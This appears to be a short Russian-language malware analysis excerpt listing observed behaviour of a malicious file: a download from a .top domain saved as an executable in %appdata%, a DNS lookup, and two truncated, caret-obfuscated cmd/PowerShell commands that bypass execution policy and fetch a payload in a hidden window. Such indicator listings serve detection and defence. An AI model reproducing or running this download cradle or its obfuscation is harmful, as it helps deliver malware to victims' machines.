Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^wErSHelL.exE ^-ExEcUTiO^npO^L^iCy By^p^A^Ss -^n^OprOf^ilE -w^i^N^DoWsTyL^e ^HID^D^e^n^ (n^ew-^OBJeC^t^ s^YStE^M.NeT.^W^EbCLIeNT).D^oWNlO^aDFiLe('http://toagoores.top/read.php?...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "po^wErSHelL.exE ^-ExEcUTiO^npO^L^iCy By^p^A^Ss -^n^OprOf^ilE -w^i^N^DoWsTyL^e ^HID^D^e^n^ (n^ew-^OBJeC^t^ s^YStE^M.NeT.^W^EbCLIeNT).D^oWNlO^aDFiLe('http://toagoores.top/read.php?...' (со скрытым окном)